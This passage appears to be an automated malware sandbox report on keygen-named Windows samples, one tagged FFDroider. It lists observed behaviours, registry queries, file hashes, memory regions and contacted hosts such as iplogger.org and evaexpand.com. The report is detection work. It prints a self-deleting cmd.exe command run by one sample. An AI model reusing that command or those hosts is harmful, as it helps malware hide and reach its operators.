| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 136
Network
Files
memory/2104-1-0x0000000002C30000-0x0000000002D30000-memory.dmp
memory/2104-2-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2104-3-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2104-5-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2104-4-0x0000000000400000-0x0000000002B4E000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4852-0-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4852-1-0x00000000001C0000-0x00000000001C3000-memory.dmp
memory/4852-3-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4852-6-0x0000000003910000-0x0000000003920000-memory.dmp
memory/4852-12-0x0000000003AB0000-0x0000000003AC0000-memory.dmp
memory/4852-19-0x0000000004560000-0x0000000004568000-memory.dmp
memory/4852-20-0x0000000004580000-0x0000000004588000-memory.dmp
memory/4852-22-0x0000000004640000-0x0000000004648000-memory.dmp
memory/4852-25-0x0000000004600000-0x0000000004608000-memory.dmp
memory/4852-26-0x0000000004780000-0x0000000004788000-memory.dmp
memory/4852-28-0x0000000004BB0000-0x0000000004BB8000-memory.dmp
memory/4852-27-0x0000000004CB0000-0x0000000004CB8000-memory.dmp
memory/4852-29-0x0000000004A10000-0x0000000004A18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 926407224df15a10caf40fc9298ce828 |
| SHA1 | 6f75fa8e1a65e959d62a464fcfc99f0050533c67 |
| SHA256 | 702f8cf79dd9e9d67dde01190b0bb162aea279b3b70c74322808bc9c9d217633 |
| SHA512 | 1e91df25d5d287d80ec04212e95ef2cb061eb7850f60968435326d58f8a129bc24090f868e8b70d99bd1c414aed0158cb7c449a1b30152a99c2f4fd43f97333c |
memory/4852-42-0x0000000004580000-0x0000000004588000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 52cc34948f5c135e341dd212713f5400 |
| SHA1 | cc032360546aad1c535b0998a9709f7851631a46 |
| SHA256 | a717251c2a877cb54c7b412a9462148ee8b122d23620351ae6f0328c6c9712c2 |
| SHA512 | 7469714b7db68c88917e85516e129e0105f837b27d78d2f545761a6dec985e89fbe249f0ffbf685c33110139b85ca96287c27cfc396bc914afa7b4d823e81c62 |
memory/4852-50-0x0000000004A10000-0x0000000004A18000-memory.dmp
memory/4852-52-0x0000000004B40000-0x0000000004B48000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | ad58a866bf97e3aa3d9aa136587a5cc8 |
| SHA1 | 534aacde8723eb76da963dda84607fe7439ccafa |
| SHA256 | 9e38a8344af814859c018dfb77eb724c743d08520962f22f95fbabe479670a70 |
| SHA512 | b6799227a196cd483e18adf621d407eb8aa04b39df97ad419624a2b70a5dadaf4c6ef84a2a87c4e7091269a8902ad56ea7f2c2041df1769a7e733303a4b25244 |
memory/4852-65-0x0000000004580000-0x0000000004588000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | cdb328429acbc0efeaebfab4ee3eed2f |
| SHA1 | a023d55c23c80842d268d0fd5de0d6ab251a9c56 |
| SHA256 | c10cbb8eace9c8ed2c101eed47be489afc6b02faa3de6e730c9d99b35c916e0a |
| SHA512 | 89446a66076db7f761deecbd47edfaeede34d80da07f697d2f745ed59a6054c8e855e58e32df50385e3845a204284db1c9b3a672a255b4e69d6fe39518ff0efa |
memory/4852-73-0x0000000004B40000-0x0000000004B48000-memory.dmp
memory/4852-75-0x0000000004A10000-0x0000000004A18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 5914297f621150d0bebf27bd8128c7eb |
| SHA1 | ef38ea187d0c74be194ea4ac28d300cc3b7c6ec9 |
| SHA256 | dafcabfc6200521fc7ae8ef2fe202acb0fc3620e9908e3981c4d3e8bc916d4ac |
| SHA512 | 662153d29e01443b3c1e1cb00fa9508e668f2a16a11dd3cd2bec7ee3dd865a2d9a3dc1c8b935274df879e633820e587ba3af9783ca8dca6ce74f631187b913e9 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d
| MD5 | 58f54e30eb6deca7ac60c29407f00cfd |
| SHA1 | 655b0427f848b3fdcdf73c4196fff2b6cf8d4f8a |
| SHA256 | 3fcec09c7824b369b34ad40c88df95bfa60d32db2e617bbcc47708bcdeb29673 |
| SHA512 | a5467e3cfd4e4ff754c7df33f10c522b827d875fa0d40bf0e92b031171af782e33725ef96b50b2e43d4610353d1364cd223dad052df866d86540a117e53a3959 |
memory/4852-114-0x0000000004440000-0x0000000004448000-memory.dmp
memory/4852-115-0x0000000004460000-0x0000000004468000-memory.dmp
memory/4852-123-0x0000000004500000-0x0000000004508000-memory.dmp
memory/4852-127-0x0000000004680000-0x0000000004688000-memory.dmp
memory/4852-126-0x0000000004500000-0x0000000004508000-memory.dmp
memory/4852-128-0x0000000004730000-0x0000000004738000-memory.dmp
memory/4852-129-0x0000000004740000-0x0000000004748000-memory.dmp
memory/4852-130-0x00000000046A0000-0x00000000046A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | c957fc9e6988f42276d56624338620df |
| SHA1 | 23eeb2cb741d65972a545cc9ae41af7fa51f1f7a |
| SHA256 | fc515a708906060ebd048033f885b3c64c5a73a2e2cef8af7c5a9974f0fc2ef0 |
| SHA512 | b42ab56c07d4599f24845cd3d64f3ebf9b0bbd5ef2dc53c285a4b31d9d5053dda08b513a2a90f6e3db82cd6e2963a35b5831fea325eb43701ec51d844fb760ac |
memory/4852-143-0x0000000004460000-0x0000000004468000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | cb8194a410bddba0fafd4ec525a276f0 |
| SHA1 | eefb3ffc2193ebf20a93b86f56608d73ec71fd0e |
| SHA256 | b291b9386ac190771b269519d4cc39f62f67c599a8395069207875658108a5fe |
| SHA512 | 7a2434eb70d6a9e12a5edac585118274e100929241fd2218afe82cbb22aecbc8beb420fcbd3c66697dc10b1f7a952d796e67f3ec6f08ae56fb873f5e03427b72 |
memory/4852-151-0x00000000046A0000-0x00000000046A8000-memory.dmp
memory/4852-153-0x00000000046D0000-0x00000000046D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 31a271b58938255b0e09bc9a8a09e4f9 |
| SHA1 | 26082d035328da9f6cb5eba2f6d23dcfbe435de4 |
| SHA256 | 084affe38efc8bdab6efd114b25a87bbeec3a2b1228b992229573a2dd916c80d |
| SHA512 | 000fe7c00b944950aacb0b96e4352879bfccc92481effc61e84beed9849bf2946b30574fa1003c8a10b997eeaaad6169f8daed7280e05b0bd138ea7bc10c4026 |
memory/4852-166-0x0000000004460000-0x0000000004468000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 5eb4fbc613422f173ceab6222fb77668 |
| SHA1 | 5212c3693f01398a9a46b8d87d84f434603e7c37 |
| SHA256 | e994e0640bb1d18ade56d54f67fd5bac0ef9d2c90a26391f07a89f1409bed93f |
| SHA512 | e2f7e3123f1ea64c8bf4c0a520617750699647b867bfd812b80731c37f644d74fd0bb27d9b82524622b9598bedcab7ae795c803c2b2676e768ad1cbaa36b33f7 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 247bc2d143127033fd0e239696aa7e4d |
| SHA1 | acd55dc758133c460a3a3a3bdc7382c01ef1ad15 |
| SHA256 | 6161c72ba76fa6e1bf3df4370c998e87038143eb6b75d778865f352efd35f727 |
| SHA512 | 24bcef61e62b968736aef10d968539de50e978b05cfe644bc6ac736df00e0fa9d6a1cc8dde631c1c4eb37bf51256bb0c00bee78d8649637ede6f6c7684197773 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 7f47a2f74490393a0e2be1606befa507 |
| SHA1 | b3bcb0ecd5253adc200744ac04b733c6e54c3d07 |
| SHA256 | f2dc48f6e3ddd6c44f0766df5c78c03a9b5f481aa9bfc59c12888162b2b30384 |
| SHA512 | 6b2ef7c410c5092b2eb3820cf6ba6e1b8b62e39a7c3c6689d1e9632c810ede6ebe057508473da6cc7fff5c46cd61a7053a9302a2064170864a2845f20d4d991f |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 9c587692d84b0ddcc1517f5b1d9d3fee |
| SHA1 | fea4316a842c0690d22b3427dbc90e1555be2b4f |
| SHA256 | c752b6af13651bb4da039bf2f0c12ad8c940d0d7a0420e9d8db44ad4894cafaa |
| SHA512 | 7f54dce72438c12314e1a0aff392591378cef4b7f8a63a7dea073ccf337f901d593c3cabf2af297b6f1c403ec56cb04d90f02ae63f08ab2aac43b1a55c2cc139 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 3deba472e3a69e0743ebf3810e6a4810 |
| SHA1 | 306971a845445a88acef46f4d395879ceb0c6b7c |
| SHA256 | 1d1e698568de105859227fc703439e1c7db758724b8db1441b43669bd617b8bb |
| SHA512 | dd79abcc3b2bc8f47f7c0f6f6206c15faa988e9d37b0a2454dafb040a4be294cbd31cad6c0ce13842e8a38af29397a6749b3def9e3ba4751107df319b8bb5b0b |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | a4f50f88bc64bfa23fd4761fd2a6100c |
| SHA1 | 5088b5bccd302613a9723958a25d3a49141679f4 |
| SHA256 | 3bd289dcf9af37c5900242c7761a7064ed4fb66f22bfd5b5c1f7c14b2941ba89 |
| SHA512 | 62a7af73e54725a6b8ff74e421824432bb6a3eb1f8688f25691b8360de76758f4d6bb18a7c8a6d66df0f0e9aeb00d4a301d281b6c2fd63e01928f317e985a0d0 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | fa746b739da82d6bd0a0819819d34b35 |
| SHA1 | f0a519f9a3ae8f4cfee7ca4ed1ded8d660cbf44a |
| SHA256 | 76e626f247194925983d2bb363251aa45baecc3dd8ca1ec1251928e5ad2d4428 |
| SHA512 | 6cab21ab75bd09c6dc11bb902bedfa2916689acd705f4c56c4c7cd29ccb215e9af2100075b588d341c377ca1f9a51f9691a94a0aef66a265abd888dd4c5abd31 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 63a03ba3064caf924be2c620567765c0 |
| SHA1 | 7d7f328a47dce9fea412e455f7f638b98a5ec420 |
| SHA256 | 9ca8dd42e233b7dae30d9b7634f26831a177c7d362e668c4c7404d10b4e93fb8 |
| SHA512 | 58770ae35e81aaa6c87382c8f5be01a761274d569c6f9b1ccd6a869c3581b8e66f81a9c2be16374a5aa96e5f3ee67c2fb3159b14cb51790ff861b3b6e69756f9 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 1c106a7935fb8d24ea63f3be3a11bf1a |
| SHA1 | 59950ea6d6c8efe7dcd50e9406b00727e4d84fb8 |
| SHA256 | ffc10336ecc1636cdb7d4f59790f1870e1ebfaf7cc6c5e2430183016d9fde427 |
| SHA512 | 24e13185997839ff830f54d8558d0b4e418f510e09d494a20bc6a555dc6f8a8f7a4840757defda2520789a1e80a9f402f5fd4efbb002b2bfc9c203ff7a1c1fc0 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 7b6dab3730e624083fd0bdc439804d90 |
| SHA1 | 91f0b46b2a6457a62bc489a4e250b05296d54798 |
| SHA256 | 202815f0c793a6b616b6e6c7f839c77efe3a72d7b661362a4619c49a7679dd14 |
| SHA512 | 84092ea02e60093c19b94b6f6491b9a08816c82490a39ac12891bafdcee581383dd7299dd72e504605297b462ee70f340043dd17e0c4b1ed9c5936835ec67ad4 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 5010c8cf5d1d8c19942158cdaf17dc1a |
| SHA1 | 0578ddbcfe262e8d005aa252cfb958e6b9d3d92a |
| SHA256 | 35e010a1b8c12ec0b291c8c9ded940ebd31243be2f06972200a543e4a8fb78b5 |
| SHA512 | aaf7e29f98134337c4f906470c2668ca2dbdfb9790e09c84c6b5c771fb1477600cdc7a3da601af0b25d2b555669fcd644fe0578b4388b85d8d4f4ee6b19795a6 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 76ad364c071795e8b6fc0b3aff8269e1 |
| SHA1 | 5b8fb20fa90bb888e391c7de497db1cf191cebcc |
| SHA256 | 51fdedfc60c1d3d2e35464730ab62687d4a60a61c50585c27f5d8e924b5a7dda |
| SHA512 | 62c70ace52e29e1acb16057b6793224f4323a681068df85c050158158f5ccdbfaeb4ec9949adca72847ab9a5bf4cb1bff105fc827cd2e4d2114c587f0d7ced12 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 3ef9e2341185bec0c8e28edb71cb99f4 |
| SHA1 | dfad98e3e8acf9ad118893d3df08bedfcf624ff0 |
| SHA256 | be4ad11d94fae014b130ab8920e6aa1721d7d0e14430ae37143c49e7aa432656 |
| SHA512 | 5cecf5522dc3320fee47f3ec388b4c2b57679ad110388bed3f69e4598167d178e9f0de1ef39a3b414d9370f55144546b569c399d0e31d1e3792dc5638fecea08 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 52284ab79ce0eeb3c90042ab6855e970 |
| SHA1 | 305bf99234fdd6eddbfe99f0442e4dea448ffbab |
| SHA256 | 23bb05ad23d4ffb49251d47033d9f7f2734fe9e7d242fa8e81328598d7c383e2 |
| SHA512 | 92d79090e2d82d387a0ce08e9298d053b3679d850eb6cf9971c5c657a4c9eb9f8afacf930c48aa58a9f6a2aa04cedffb26c98607e07a42ee2a714a1a5eb46e24 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 57ea81cd632caed424a9e7e35f7fe0a7 |
| SHA1 | 454a6d74e693adfc5b2d9ff25b555abb57df1043 |
| SHA256 | 5ace4f7eb57f28349178e12b9b6342ac3113e085ef3ab3f0e4eab391845c0757 |
| SHA512 | 3d0e7dc07f5e939d82eb25f6f142735ffac0e5234dfaffc594a52bc341e581f4ee4d18a322e814bbe6335a510e091a922d1c59547a3ed3650b3066d07565271d |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 16d8c395a5e54ff35e8950785af93112 |
| SHA1 | 848ccd1cd1128538ad143ae55cbb6d48e3c91d64 |
| SHA256 | 26160883b9326df451dd0abc8d6f47470cd6a3e350003b6d89147435728d6ea7 |
| SHA512 | 0486d1bf14b9e58d6be21bdef09e98abc3d8e084eed4314025a4a59bfbc55fec3e13d94c54fa9c7dd2901c4aee07fa43209828dde64af58f0f07207396259318 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.INTEG.RAW
| MD5 | 3976333bf75bbe7b83207471faf22056 |
| SHA1 | 31874cdfb8e8a54c9d20357fbdf73b5bc9784c6a |
| SHA256 | c21272bb7a988bfdf4cf3864eb9da35f80c523877c464850d455a67f09745ef9 |
| SHA512 | a8e30e506e37ecfb9a905b5efe6f300d980ff40096ee66c51fc4f2317b98bdee7d3c1620a0c85aaa1bff73dfe84ca3eb4917e45234aedb3f42a2c50c729c55b9 |
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm
| MD5 | 83a38a48f18c2fdef2bbc144bf4ef6d0 |
| SHA1 | 6b94568f44a384eadf1daed3e8c1342f2651607b |
| SHA256 | 51d9cbbbc92be6caa5ca644ab97ff7e146ac1b5207cb32a82ee8d3c804d2ff73 |
| SHA512 | fb23f7e9624f9b42e523b50d6b4e5434faadea0d3f3da55411b56591bad7752efd33b5a02ed7d45a5711b8ea014020cf21a685d327a24bafb71b44ccf1c42989 |
memory/4852-505-0x0000000000400000-0x0000000000667000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
136s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.9.200.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/4156-0-0x0000000002A70000-0x0000000002A88000-memory.dmp